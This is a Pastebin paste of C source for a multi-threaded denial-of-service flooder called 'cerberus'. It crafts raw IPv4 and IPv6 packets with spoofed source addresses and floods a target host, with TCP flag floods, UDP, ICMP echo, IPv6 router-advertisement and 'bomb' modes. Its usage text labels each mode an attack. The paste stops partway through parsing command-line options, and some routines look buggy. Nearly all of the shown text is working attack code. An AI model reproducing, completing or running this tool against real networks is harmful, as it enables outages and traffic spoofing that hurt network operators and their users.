Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #ifndef _BSD_SOURCE
- #define _BSD_SOURCE
- #endif
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <netdb.h>
- #include <sys/types.h>
- #include <netinet/in_systm.h>
- #include <sys/socket.h>
- #include <sys/resource.h>
- #include <sys/wait.h>
- #include <string.h>
- #include <time.h>
- #include <signal.h>
- #ifndef __USE_BSD
- #define __USE_BSD
- #endif
- #ifndef __FAVOR_BSD
- #define __FAVOR_BSD
- #endif
- #include <netinet/in.h>
- #include <netinet/ip.h>
- #include <netinet/ip6.h>
- #include <netinet/ip_icmp.h>
- #include <netinet/icmp6.h>
- #include <netinet/tcp.h>
- #include <netinet/udp.h>
- #include <arpa/inet.h>
- #include <pthread.h>
- #define INET_ADDR 16
- #define INET6_ADDR 46
- #define TCP_FIN 1
- #define TCP_SYN 2
- #define TCP_RST 4
- #define TCP_PSH 8
- #define TCP_ACK 16
- #define TCP_URG 32
- #define TCP_ECE 64
- #define TCP_CWR 128
- #define TCP_NOF 256
- #define TCP_FRG 512
- #define TCP_BMB 1024
- #define UDP_BMB 2048
- #define RAW_BMB 4096
- #define UDP_CFF 8192
- #define ICMP_ECHO_G 16384
- #define ICMP6_ROUTERADV 134
- #define ICMP_HDRLEN 8
- #define TH_NOF 0x0
- #ifdef LINUX
- #define FIX(x) htons(x)
- #else
- #define FIX(x) (x)
- #endif
- void *send_tcp(void* arg);
- void *send_udp(void* arg);
- void *send_icmp(void* arg);
- void *send_icmp_ra(void* arg);
- void *send_bomb(void* arg);
- void handle_exit();
- unsigned short in_cksum(unsigned short *addr, int len);
- unsigned short xchecksum(unsigned short *buffer, int size);
- char *class2ip(const char *class);
- char *class2ip6(const char *class);
- void inject(struct ip *ip, u_char p, u_char len);
- void inject6(struct ip6_hdr *ip, u_char p, u_char len);
- u_long lookup(const char *host);
- int main(int argc, char *argv[]);
- #define MAX_THREADS 32768
- pthread_t attack_thread[MAX_THREADS];
- struct thread_data {
- int initialized; // valid thread?
- int flag4, flag6; // v4 or v6
- int start;
- int packets;
- unsigned int timeout; // attack timeout
- int thread;
- unsigned int bombsize; // size of connect bomb
- unsigned int datasize; // size of tcp data after header
- unsigned int window_size; // window size
- int socket; // rawsock
- int a_flags; // a_flags
- struct sockaddr_in destination4;
- struct sockaddr_in6 destination6;
- u_long dstaddr;
- u_char th_flags;
- int d_lport;
- int d_hport;
- int s_lport;
- int s_hport;
- char *src_class;
- char *dst_class;
- char SrcIP4[INET_ADDR];
- char SrcIP6[INET6_ADDR];
- char DestIP4[INET_ADDR];
- char DestIP6[INET6_ADDR];
- };
- struct thread_data thread_data_array[MAX_THREADS];
- void handle_exit () {
- int packets;
- packets = thread_data_array[1].packets + thread_data_array[2].packets + thread_data_array[4].packets + thread_data_array[8].packets + thread_data_array[16].packets
- + thread_data_array[32].packets + thread_data_array[64].packets + thread_data_array[128].packets + thread_data_array[256].packets
- + thread_data_array[512].packets + thread_data_array[1024].packets + thread_data_array[2048].packets + thread_data_array[4096].packets
- + thread_data_array[8192].packets + thread_data_array[16384].packets;
- printf ("Packeting completed, %d total, %d seconds, %d pps\n", packets, (int) time (NULL) -
- thread_data_array[0].start, packets / ((int) time (NULL) - thread_data_array[0].start));
- exit (0);
- }
- struct pseudo_hdr {
- u_long saddr, daddr;
- u_char mbz, ptcl;
- u_short tcpl;
- };
- struct checksum {
- struct pseudo_hdr pseudo;
- struct tcphdr tcp;
- };
- unsigned short
- in_cksum(unsigned short *addr, int len) {
- int nleft = len;
- int sum = 0;
- unsigned short *w = addr;
- unsigned short answer = 0;
- while (nleft > 1) {
- sum += *w++;
- nleft -= 2;
- }
- if (nleft == 1) {
- *(unsigned char *) (&answer) = *(unsigned char *)w;
- sum += answer;
- }
- sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
- sum += (sum >> 16);
- answer = ~sum;
- return answer;
- }
- unsigned short
- xchecksum(unsigned short *buffer, int size) {
- unsigned int sum = 0;
- __asm__ __volatile__(
- "movl (%1), %0\n"
- "subl $4, %2\n"
- "jbe 2f\n"
- "addl 4(%1), %0\n"
- "adcl 8(%1), %0\n"
- "adcl 12(%1), %0\n"
- "1:\n"
- "adcl 16(%1), %0\n"
- "lea 4(%1), %1\n"
- "decl %2\n"
- "jne 1b\n"
- "adcl $0, %0\n"
- "movl %0, %2\n"
- "shrl $16, %0\n"
- "addw %w2, %w0\n"
- "adcl $0, %0\n"
- "notl %0\n"
- "2:\n"
- : "=r" (sum), "=r" (buffer), "=r" (size)
- : "1" (buffer), "2" (size)
- );
- return(sum);
- }
- char *src_class, *dst_class = NULL;
- char *class2ip(const char *class) {
- static char ip[INET_ADDR];
- int i, j;
- for (i = 0, j = 0; class[i] != '\0'; ++i)
- if (class[i] == '.')
- ++j;
- switch (j) {
- case 0:
- sprintf(ip, "%s.%d.%d.%d", class, (int) random() % 245+1, (int) random() % 225+1, (int) random() % 215+1);
- break;
- case 1:
- sprintf(ip, "%s.%d.%d", class, (int) random() % 245+1, (int) random() % 215+1);
- break;
- case 2:
- sprintf(ip, "%s.%d", class, (int) random() % 245+1);
- break;
- default: strncpy(ip, class, INET_ADDR);
- break;
- }
- return ip;
- }
- char *class2ip6(const char *class) {
- static char ip[INET6_ADDR];
- uint16_t n;
- int x, y;
- for (x = 0, y = 0; class[x] != '\0'; ++x)
- if (class[x] == ':')
- ++y;
- int i;
- for (i = 0; i < 7; i++) {
- char hex[3][i];
- n = mrand48();
- n = rand();
- FILE * f = fopen("/dev/urandom", "rb");
- fread(&n, sizeof(uint16_t), 1, f);
- sprintf(hex[i], "%04X", n);
- if(i==0)
- strcpy(ip, class);
- strcat(ip, hex[i]);
- if(i<6)
- strcat(ip, "2001:");
- }
- return ip;
- }
- void
- inject(struct ip *ip, u_char p, u_char len) {
- ip->ip_hl = 5;
- ip->ip_v = 4;
- ip->ip_p = p;
- ip->ip_tos = 0x08; /* 0x08 */
- ip->ip_id = random();
- ip->ip_len = len;
- ip->ip_off = 0;
- ip->ip_ttl = 255;
- ip->ip_dst.s_addr = thread_data_array[0].dst_class != NULL ? inet_addr(class2ip(thread_data_array[0].dst_class)) : thread_data_array[0].dstaddr;
- ip->ip_src.s_addr = thread_data_array[0].src_class != NULL ? inet_addr(class2ip(thread_data_array[0].src_class)) : random();
- thread_data_array[0].destination4.sin_addr.s_addr = ip->ip_dst.s_addr;
- }
- void
- inject6(struct ip6_hdr *ip, u_char p, u_char len) {
- ip->ip6_ctlun.ip6_un1.ip6_un1_flow = htonl ((6 << 28) | (0 << 20) | 0);
- ip->ip6_ctlun.ip6_un1.ip6_un1_plen = htons( 8 + len );
- ip->ip6_ctlun.ip6_un1.ip6_un1_nxt = p;
- ip->ip6_ctlun.ip6_un1.ip6_un1_hlim = 255;
- inet_pton (AF_INET6, thread_data_array[0].DestIP6, &ip->ip6_dst);
- inet_pton (AF_INET6, thread_data_array[0].src_class, &ip->ip6_src);
- thread_data_array[0].destination6.sin6_addr = ip->ip6_dst;
- }
- u_long lookup(const char *host) {
- struct hostent *hp;
- if ( (hp = gethostbyname2(host,AF_INET)) == NULL) {
- perror("gethostbyname2");
- exit(-1);
- }
- return *(u_long *)hp->h_addr;
- }
- int resolve (const char *host) {
- struct addrinfo hints, *res;
- int errcode;
- char addrstr[100];
- void *ptr;
- memset (&hints, 0, sizeof (hints));
- hints.ai_family = PF_UNSPEC;
- hints.ai_socktype = SOCK_STREAM;
- hints.ai_flags |= AI_CANONNAME;
- errcode = getaddrinfo (host, NULL, &hints, &res);
- if (errcode != 0) {
- perror ("[-] getaddrinfo");
- exit(-1);
- }
- while (res) {
- inet_ntop (res->ai_family, res->ai_addr->sa_data, addrstr, 100);
- switch (res->ai_family) {
- case AF_INET:
- ptr = &((struct sockaddr_in *) res->ai_addr)->sin_addr;
- break;
- case AF_INET6:
- ptr = &((struct sockaddr_in6 *) res->ai_addr)->sin6_addr;
- break;
- }
- inet_ntop (res->ai_family, ptr, addrstr, 100);
- res = res->ai_next;
- }
- return 0;
- }
- //resolve(argv[1]); // example if you wish to use
- void *send_tcp(void* arg) {
- struct thread_data *param2 = arg;
- struct checksum checksum;
- struct packet
- {
- struct ip ip;
- struct tcphdr tcp;
- char buf[param2->datasize];
- } packet;
- struct packet6
- {
- struct ip6_hdr ip;
- struct tcphdr tcp;
- char buf[param2->datasize];
- } packet6;
- printf("[%d] Acquired socket %d\n", param2->thread, param2->socket);
- signal(SIGALRM, handle_exit);
- alarm(thread_data_array[0].timeout);
- if (thread_data_array[0].flag4 == 1 && thread_data_array[0].flag6 == 0)
- {
- do
- {
- memset(&packet, 0x0, sizeof(packet.ip)+sizeof(packet.tcp)+param2->datasize);
- inject(&packet.ip, IPPROTO_TCP, FIX(sizeof(packet)));
- packet.ip.ip_sum = in_cksum((void *)&packet.ip, sizeof(packet));
- checksum.pseudo.daddr = thread_data_array[0].dstaddr;
- checksum.pseudo.mbz = 0;
- checksum.pseudo.ptcl = IPPROTO_TCP;
- checksum.pseudo.tcpl = sizeof(struct tcphdr);
- checksum.pseudo.saddr = packet.ip.ip_src.s_addr;
- packet.tcp.th_win = htons(65535);
- packet.tcp.th_seq = random();
- //packet.tcp.th_x2 = 4;
- if (param2->th_flags == TH_ACK || param2->a_flags == TCP_FRG)
- packet.tcp.th_ack = random();
- else
- packet.tcp.th_ack = 0;
- if(param2->a_flags == TCP_FRG)
- {
- packet.tcp.th_flags = (rand()%(TH_SYN-TH_FIN))+TH_FIN;
- packet.tcp.th_off = sizeof(packet.tcp) / 4;
- }
- else
- {
- packet.tcp.th_flags = param2->th_flags;
- packet.tcp.th_off = 5;
- }
- if (param2->th_flags == TH_URG || param2->a_flags == TCP_FRG)
- packet.tcp.th_urp = htons(sizeof(packet));
- else
- packet.tcp.th_urp = 0;
- packet.tcp.th_sport = thread_data_array[0].s_lport == 0 ?
- random () :
- htons(thread_data_array[0].s_lport + (random() %
- (thread_data_array[0].s_hport - thread_data_array[0].s_lport + 1)));
- packet.tcp.th_dport = thread_data_array[0].d_lport == 0 ?
- random () :
- htons(thread_data_array[0].d_lport + (random() %
- (thread_data_array[0].d_hport - thread_data_array[0].d_lport + 1)));
- checksum.tcp = packet.tcp;
- packet.tcp.th_sum = xchecksum((void *)&checksum, sizeof(checksum));
- param2->packets++;
- } while ( sendto(param2->socket, &packet, (sizeof packet),0, (struct sockaddr *)&thread_data_array[0].destination4,
- sizeof(thread_data_array[0].destination4)) );
- }
- if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1)
- {
- do
- {
- //memset(&packet6, 0, sizeof packet6);
- memset(&packet6, 0x0, sizeof(packet.ip)+sizeof(packet.tcp)+param2->datasize);
- inject6(&packet6.ip, IPPROTO_TCP, FIX(sizeof packet6));
- checksum.pseudo.daddr = thread_data_array[0].dstaddr;
- checksum.pseudo.mbz = 0;
- checksum.pseudo.ptcl = IPPROTO_TCP;
- checksum.pseudo.tcpl = sizeof(struct tcphdr);
- packet6.tcp.th_win = htons(65535);
- packet6.tcp.th_seq = random();
- if (param2->th_flags == TH_ACK || param2->a_flags == TCP_FRG)
- packet.tcp.th_ack = random();
- else
- packet.tcp.th_ack = 0;
- if(param2->a_flags == TCP_FRG)
- {
- packet.tcp.th_flags = (rand()%(TH_SYN-TH_FIN))+TH_FIN;
- packet.tcp.th_off = sizeof(packet.tcp) / 4;
- }
- else
- {
- packet.tcp.th_flags = param2->th_flags;
- packet.tcp.th_off = 5;
- }
- if (param2->th_flags == TH_URG || param2->a_flags == TCP_FRG)
- packet.tcp.th_urp = htons(sizeof(packet));
- else
- packet.tcp.th_urp = 0;
- packet6.tcp.th_sport = thread_data_array[0].s_lport == 0 ?
- random () :
- htons(thread_data_array[0].s_lport + (random() %
- (thread_data_array[0].s_hport - thread_data_array[0].s_lport + 1)));
- packet6.tcp.th_dport = thread_data_array[0].d_lport == 0 ?
- random () :
- htons(thread_data_array[0].d_lport + (random() %
- (thread_data_array[0].d_hport - thread_data_array[0].d_lport + 1)));
- checksum.tcp = packet.tcp;
- packet.tcp.th_sum = xchecksum((void *)&checksum, sizeof(checksum));
- param2->packets++;
- } while ( sendto(param2->socket, &packet6.tcp, (sizeof packet6), 0, (struct sockaddr *)&thread_data_array[0].destination6,sizeof(thread_data_array[0].destination6)) );
- }
- return 0;
- }
- void *send_udp(void* arg) {
- struct thread_data *param2 = arg;
- struct packet
- {
- struct ip ip;
- struct udphdr udp;
- char buf[param2->datasize];
- } packet;
- struct packet6
- {
- struct ip6_hdr ip;
- struct udphdr udp;
- char buf[param2->datasize];
- } packet6;
- printf("[%d] Acquired socket %d\n", param2->thread, param2->socket);
- signal(SIGALRM, handle_exit);
- alarm(thread_data_array[0].timeout);
- if (thread_data_array[0].flag4 == 1 && thread_data_array[0].flag6 == 0)
- {
- do
- {
- memset(&packet, 0x0, sizeof(packet.ip)+sizeof(packet.udp));
- inject(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
- packet.ip.ip_sum = in_cksum((void *)&packet.ip, sizeof(packet));
- packet.udp.uh_sport = thread_data_array[0].s_lport == 0 ?
- random () :
- htons(thread_data_array[0].s_lport + (random() %
- (thread_data_array[0].s_hport - thread_data_array[0].s_lport + 1)));
- packet.udp.uh_dport = thread_data_array[0].d_lport == 0 ?
- random () :
- htons(thread_data_array[0].d_lport + (random() %
- (thread_data_array[0].d_hport - thread_data_array[0].d_lport + 1)));
- packet.udp.uh_ulen = htons(sizeof packet.udp);
- packet.udp.uh_sum = 0;
- packet.udp.uh_sum = xchecksum((void *)&packet, sizeof(packet));
- param2->packets++;
- } while ( sendto(param2->socket, &packet, (sizeof packet), 0, (struct sockaddr *)&thread_data_array[0].destination4,sizeof(thread_data_array[0].destination4)) );
- }
- else if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1)
- {
- do
- {
- memset(&packet6, 0x0, sizeof(packet6.ip)+sizeof(packet6.udp));
- inject6(&packet6.ip, IPPROTO_UDP, FIX(sizeof packet6));
- packet6.udp.uh_sport = thread_data_array[0].s_lport == 0 ?
- random () :
- htons(thread_data_array[0].s_lport + (random() %
- (thread_data_array[0].s_hport - thread_data_array[0].s_lport + 1)));
- packet6.udp.uh_dport = thread_data_array[0].d_lport == 0 ?
- random () :
- htons(thread_data_array[0].d_lport + (random() %
- (thread_data_array[0].d_hport - thread_data_array[0].d_lport + 1)));
- packet6.udp.uh_ulen = htons(sizeof packet6.udp);
- packet6.udp.uh_sum = 0;
- packet6.udp.uh_sum = xchecksum((void *)&packet6, sizeof(packet6));
- param2->packets++;
- } while ( sendto(param2->socket, &packet6, (sizeof packet6), 0, (struct sockaddr *)&thread_data_array[0].destination6,sizeof(thread_data_array[0].destination6)) );
- }
- return 0;
- }
- void *send_icmp(void* arg)
- {
- struct thread_data *param2 = arg;
- struct packet
- {
- struct ip ip;
- struct icmp icmp;
- } packet;
- struct packet6
- {
- struct ip6_hdr ip;
- struct icmp6_hdr icmp;
- } packet6;
- printf("[%d] Acquired socket %d\n", param2->thread, param2->socket);
- signal(SIGALRM, handle_exit);
- alarm(thread_data_array[0].timeout);
- if (thread_data_array[0].flag4 == 1 && thread_data_array[0].flag6 == 0)
- {
- do
- {
- memset(&packet, 0x0, sizeof(packet.ip)+sizeof(packet.icmp));
- inject(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
- packet.ip.ip_sum = xchecksum((void *)&packet.ip, sizeof(packet.ip));
- packet.icmp.icmp_type = ICMP_ECHO;
- packet.icmp.icmp_code = 0;
- packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8));
- packet.icmp.icmp_id = random() % 255;
- packet.icmp.icmp_seq = random() % 255;
- param2->packets++;
- } while ( sendto( param2->socket, &packet, (sizeof packet),0, (struct sockaddr *)&thread_data_array[0].destination4,
- sizeof(thread_data_array[0].destination4)) );
- }
- else if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1)
- {
- do
- {
- memset(&packet6, 0x0, sizeof(packet6.ip)+sizeof(packet6.icmp));
- inject6(&packet6.ip, IPPROTO_ICMPV6, FIX(sizeof packet6));
- packet6.icmp.icmp6_type = ICMP6_ECHO_REQUEST;
- packet6.icmp.icmp6_code = 0;
- packet6.icmp.icmp6_cksum = 0;
- packet6.icmp.icmp6_cksum = xchecksum((void *)&packet6, sizeof(packet6));
- packet6.icmp.icmp6_id = random();
- packet6.icmp.icmp6_seq = random();
- param2->packets++;
- } while ( sendto( param2->socket, &packet6.icmp, (sizeof packet6),0, (struct sockaddr *)&thread_data_array[0].destination6,
- sizeof(thread_data_array[0].destination6)) );
- }
- return 0;
- }
- void *send_icmp_ra(void* arg) {
- struct thread_data *param2 = arg;
- struct packet6
- {
- struct ip6_hdr ip;
- struct icmp6_hdr icmp;
- } packet6;
- printf("[%d] Acquired socket %d\n", param2->thread, param2->socket);
- signal(SIGALRM, handle_exit);
- alarm(thread_data_array[0].timeout);
- if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1) {
- do {
- memset(&packet6, 0, sizeof(packet6.ip)+sizeof(packet6.icmp));
- inject6(&packet6.ip, IPPROTO_ICMPV6, FIX(sizeof packet6));
- packet6.icmp.icmp6_type = ICMP6_ROUTERADV;
- packet6.icmp.icmp6_code = 0;
- packet6.icmp.icmp6_cksum = 0;
- packet6.icmp.icmp6_cksum = xchecksum((void *)&packet6, sizeof(packet6));
- packet6.icmp.icmp6_id = random();
- packet6.icmp.icmp6_seq = random();
- param2->packets++;
- } while ( sendto( param2->socket, &packet6.icmp, (sizeof packet6),0, (struct sockaddr *)&thread_data_array[0].destination6,
- sizeof(thread_data_array[0].destination6)) );
- }
- return 0;
- }
- void *send_bomb(void* arg) {
- struct thread_data *param2 = arg;
- struct checksum checksum;
- struct packet
- {
- struct ip ip;
- struct tcphdr tcp;
- struct udphdr udp;
- char buf[param2->bombsize];
- } packet;
- struct packet6
- {
- struct ip6_hdr ip;
- struct tcphdr tcp;
- struct udphdr udp;
- char buf[param2->bombsize];
- } packet6;
- if (thread_data_array[0].flag4 == 1 && thread_data_array[0].flag6 == 0)
- {
- if(param2->a_flags == RAW_BMB)
- param2->socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
- }
- else if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1)
- {
- if(param2->a_flags == RAW_BMB)
- param2->socket = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
- }
- int i;
- for (i = sizeof(packet) + 1; i < (param2->bombsize); i++)
- {
- packet.buf[i] = '\x00';
- }
- if (thread_data_array[0].flag4 == 1 && thread_data_array[0].flag6 == 0)
- connect(param2->socket, (struct sockaddr *)&thread_data_array[0].destination4, sizeof(struct sockaddr_in));
- else if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1)
- connect(param2->socket, (struct sockaddr *)&thread_data_array[0].destination6, sizeof(struct sockaddr_in6));
- printf("[%d] Acquired socket %d\n", param2->thread, param2->socket);
- signal(SIGALRM, handle_exit);
- alarm(thread_data_array[0].timeout);
- do
- {
- if (thread_data_array[0].flag4 == 1 && thread_data_array[0].flag6 == 0)
- {
- if(param2->a_flags == TCP_BMB || param2->a_flags == RAW_BMB)
- {
- memset(&packet, 0, sizeof packet);
- inject(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
- packet.ip.ip_sum = in_cksum((void *)&packet.ip, sizeof(packet));
- checksum.pseudo.daddr = thread_data_array[0].dstaddr;
- checksum.pseudo.mbz = 0;
- if(param2->a_flags == TCP_BMB)
- checksum.pseudo.ptcl = IPPROTO_TCP;
- else if(param2->a_flags == RAW_BMB)
- checksum.pseudo.ptcl = IPPROTO_RAW;
- checksum.pseudo.tcpl = sizeof(struct tcphdr);
- checksum.pseudo.saddr = packet.ip.ip_src.s_addr;
- packet.tcp.th_win = htons(65535);
- packet.tcp.th_seq = random();
- packet.tcp.th_off = 5;
- //thread_data_array[0].destination4.sin_port = htons(113);
- checksum.tcp = packet.tcp;
- //packet.tcp.th_sum = xchecksum((void *)&checksum, sizeof(checksum));
- }
- else if(param2->a_flags == UDP_BMB)
- {
- memset(&packet, 0, sizeof packet);
- inject(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
- packet.ip.ip_sum = in_cksum((void *)&packet.ip, sizeof(packet));
- packet.udp.uh_ulen = htons(sizeof packet.udp);
- packet.udp.uh_sum = 0;
- }
- }
- else if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1)
- {
- if(param2->a_flags == TCP_BMB || param2->a_flags == RAW_BMB)
- {
- memset(&packet6, 0, sizeof packet6);
- inject6(&packet6.ip, IPPROTO_TCP, FIX(sizeof packet6));
- checksum.pseudo.daddr = thread_data_array[0].dstaddr;
- checksum.pseudo.mbz = 0;
- if(param2->a_flags == TCP_BMB)
- checksum.pseudo.ptcl = IPPROTO_TCP;
- else if(param2->a_flags == RAW_BMB)
- checksum.pseudo.ptcl = IPPROTO_RAW;
- checksum.pseudo.tcpl = sizeof(struct tcphdr);
- packet6.tcp.th_win = htons(65535);
- packet6.tcp.th_seq = random();
- } else if(param2->a_flags == UDP_BMB) {
- memset(&packet6, 0, sizeof packet6);
- inject6(&packet6.ip, IPPROTO_UDP, FIX(sizeof packet6));
- packet6.udp.uh_ulen = htons(sizeof packet6.udp);
- packet6.udp.uh_sum = 0;
- }
- }
- param2->packets++;
- } while ( send(param2->socket, &packet, sizeof(packet), 0) );
- return 0;
- }
- const char *banner_name = "\e[1;37m(\e[0m\e[0;31mcerberus\e[0m\e[1;37m)\e[0m-\e[1;37mby\e[0m-\e[1;37m(\e[0m\e[0;31mbloodbath\e[0m\e[1;37m)\e[0m";
- static void
- usage(const char *argv0) {
- printf("%s \n", banner_name);
- printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
- printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
- printf(" -R Router attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
- printf(" -T TCP attack \e[1;37m(\e[0m0:FIN 1: SYN\e[1;37m)\e[0m\n");
- printf(" \e[1;37m(\e[0m2:RST 3:PUSH\e[1;37m)\e[0m\n");
- printf(" \e[1;37m(\e[0m4:ACK 5: URG\e[1;37m)\e[0m\n");
- printf(" \e[1;37m(\e[0m6:ECE 7: CWR\e[1;37m)\e[0m\n");
- printf(" \e[1;37m(\e[0m8:NOF 9:FRAG\e[1;37m)\e[0m\n");
- printf(" -B BMB attack [type,size] \e[1;37m[\e[0m0:TCP 1:UDP 2:RAW\e[1;37m]\e[0m\n");
- printf(" -h destination ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
- printf(" -d destination class \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
- printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
- printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
- printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
- printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
- printf(" -w window size [ 1-65535 ] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
- printf("\e[1mUsage\e[0m: %s -4 -6 [-U -I -T -B -h -d -s -p -q -t]\n", argv0);
- exit(-1);
- }
- int
- main(int argc, char *argv[]) {
- int i = 0, n;
- int on = 1;
- struct sockaddr_in DestAddress4;
- struct sockaddr_in6 DestAddress6;
- thread_data_array[0].a_flags = 0;
- thread_data_array[0].window_size = 0;
- for (i = TCP_FIN; i <= ICMP_ECHO_G; i*=2) {
- thread_data_array[i].a_flags = 0;
- }
- while ( (n = getopt(argc, argv, "46T:B:IRUh:d:s:t:p:q:w:")) != -1) {
- char *p;
- unsigned int bombsize = 0;
- unsigned int datasize = 0;
- unsigned int window_size = 0;
- switch (n)
- {
- case '4':
- thread_data_array[0].flag4 = 1;
- break;
- case '6':
- thread_data_array[0].flag6 = 1;
- break;
- case 'T':
- if ( (p = (char *) strchr(optarg, ',')) == NULL)
- datasize = 4;
- if(datasize == 0)
- datasize = atoi(p + 1);
- if(datasize > 4096)
- datasize = 4096;
- switch (atoi(optarg))
- {
- case 0:
- thread_data_array[TCP_FIN].initialized = 1;
- thread_data_array[0].a_flags |= TCP_FIN;
- thread_data_array[TCP_FIN].a_flags |= TCP_FIN;
- thread_data_array[TCP_FIN].datasize = datasize;
- break;
- case 1:
- thread_data_array[TCP_SYN].initialized = 1;
- thread_data_array[0].a_flags |= TCP_SYN;
- thread_data_array[TCP_SYN].a_flags |= TCP_SYN;
- thread_data_array[TCP_SYN].datasize = datasize;
- break;
- case 2:
- thread_data_array[TCP_RST].initialized = 1;
- thread_data_array[0].a_flags |= TCP_RST;
- thread_data_array[TCP_RST].a_flags |= TCP_RST;
- thread_data_array[TCP_RST].datasize = datasize;
- break;
- case 3:
- thread_data_array[TCP_PSH].initialized = 1;
- thread_data_array[0].a_flags |= TCP_PSH;
- thread_data_array[TCP_PSH].a_flags |= TCP_PSH;
- thread_data_array[TCP_PSH].datasize = datasize;
- break;
- case 4:
- thread_data_array[TCP_ACK].initialized = 1;
- thread_data_array[0].a_flags |= TCP_ACK;
- thread_data_array[TCP_ACK].a_flags |= TCP_ACK;
- thread_data_array[TCP_ACK].datasize = datasize;
- break;
- case 5:
- thread_data_array[TCP_URG].initialized = 1;
- thread_data_array[0].a_flags |= TCP_URG;
- thread_data_array[TCP_URG].a_flags |= TCP_URG;
- thread_data_array[TCP_URG].datasize = datasize;
- break;
- case 6:
- thread_data_array[TCP_ECE].initialized = 1;
- thread_data_array[0].a_flags |= TCP_ECE;
- thread_data_array[TCP_ECE].a_flags |= TCP_ECE;
- thread_data_array[TCP_ECE].datasize = datasize;
- break;
- case 7:
- thread_data_array[TCP_CWR].initialized = 1;
- thread_data_array[0].a_flags |= TCP_CWR;
- thread_data_array[TCP_CWR].a_flags |= TCP_CWR;
- thread_data_array[TCP_CWR].datasize = datasize;
- break;
- case 8:
- thread_data_array[TCP_NOF].initialized = 1;
- thread_data_array[0].a_flags |= TCP_NOF;
- thread_data_array[TCP_NOF].a_flags |= TCP_NOF;
- thread_data_array[TCP_NOF].datasize = datasize;
- break;
- case 9:
- thread_data_array[TCP_FRG].initialized = 1;
- thread_data_array[0].a_flags |= TCP_FRG;
- thread_data_array[TCP_FRG].a_flags |= TCP_FRG;
- thread_data_array[TCP_FRG].datasize = datasize;
- break;
- }
- break;
- case 'B':
- if ( (p = (char *) strchr(optarg, ',')) == NULL)
- bombsize = 64;
- if(bombsize == 0)
- bombsize = atoi(p + 1);
- if(bombsize > 2048)
- bombsize = 2048;
- switch (atoi(optarg))
- {
- case 0:
- thread_data_array[TCP_BMB].initialized = 1;
- thread_data_array[0].a_flags |= TCP_BMB;
- thread_data_array[TCP_BMB].a_flags |= TCP_BMB;
- thread_data_array[TCP_BMB].bombsize = bombsize;
- break;
- case 1:
- thread_data_array[UDP_BMB].initialized = 1;
- thread_data_array[0].a_flags |= UDP_BMB;
- thread_data_array[UDP_BMB].a_flags |= UDP_BMB;
- thread_data_array[UDP_BMB].bombsize = bombsize;
- break;
- case 2:
- thread_data_array[RAW_BMB].initialized = 1;
- thread_data_array[0].a_flags |= RAW_BMB;
- thread_data_array[RAW_BMB].a_flags |= RAW_BMB;
- thread_data_array[RAW_BMB].bombsize = bombsize;
- break;
- }
- break;
- case 'I':
- thread_data_array[ICMP6_ROUTERADV].initialized = 1;
- thread_data_array[0].a_flags |= ICMP6_ROUTERADV;
- thread_data_array[ICMP6_ROUTERADV].a_flags |= ICMP6_ROUTERADV;
- break;
- case 'R':
- thread_data_array[ICMP_ECHO_G].initialized = 1;
- thread_data_array[0].a_flags |= ICMP_ECHO_G;
- thread_data_array[ICMP_ECHO_G].a_flags |= ICMP_ECHO_G;
- break;
- case 'U':
- thread_data_array[UDP_CFF].initialized = 1;
- thread_data_array[0].a_flags |= UDP_CFF;
- thread_data_array[UDP_CFF].a_flags |= UDP_CFF;
- break;
- case 'h':
- if (thread_data_array[0].flag4 == 1 && thread_data_array[0].flag6 == 0)
- {
- DestAddress4.sin_family = AF_INET;
- inet_pton(AF_INET, optarg, &DestAddress4.sin_addr);
- thread_data_array[0].dstaddr = lookup(optarg);
- thread_data_array[0].destination4 = DestAddress4;
- }
- else if (thread_data_array[0].flag4 == 0 && thread_data_array[0].flag6 == 1)
- {
- DestAddress6.sin6_family = AF_INET6;
- inet_pton(AF_INET6, optarg, &DestAddress6.sin6_addr);
- thread_data_array[0].destination6 = DestAddress6;
- }
- else
- {
- printf("-4 and -6 can not both be specified.\n\n");
- usage(argv[0]);
- }
- break;
- case 'd':
- thread_data_array[0].dst_class = optarg;
- break;
- case 's':
- thread_data_array[0].src_class = optarg;
- break;
- case 'p':
- if ( (p = (char *) strchr(optarg, ',')) == NULL)
- usage(argv[0]);
- thread_data_array[0].d_lport = atoi(optarg); /* Destination start port */
- thread_data_array[0].d_hport = atoi(p + 1); /* Destination end port */
- break;
- case 'q':
- if ( (p = (char *) strchr(optarg, ',')) == NULL)
- usage(argv[0]);
- thread_data_array[0].s_lport = atoi(optarg); /* Source start port */
- thread_data_array[0].s_hport = atoi(p + 1); /* Source end port */
- break;
- case 't':
- thread_data_array[0].timeout = atoi(optarg);
- break;
- case 'w':
- window_size = atoi(optarg);
- if(window_size > 65535)
- window_size = 65535;
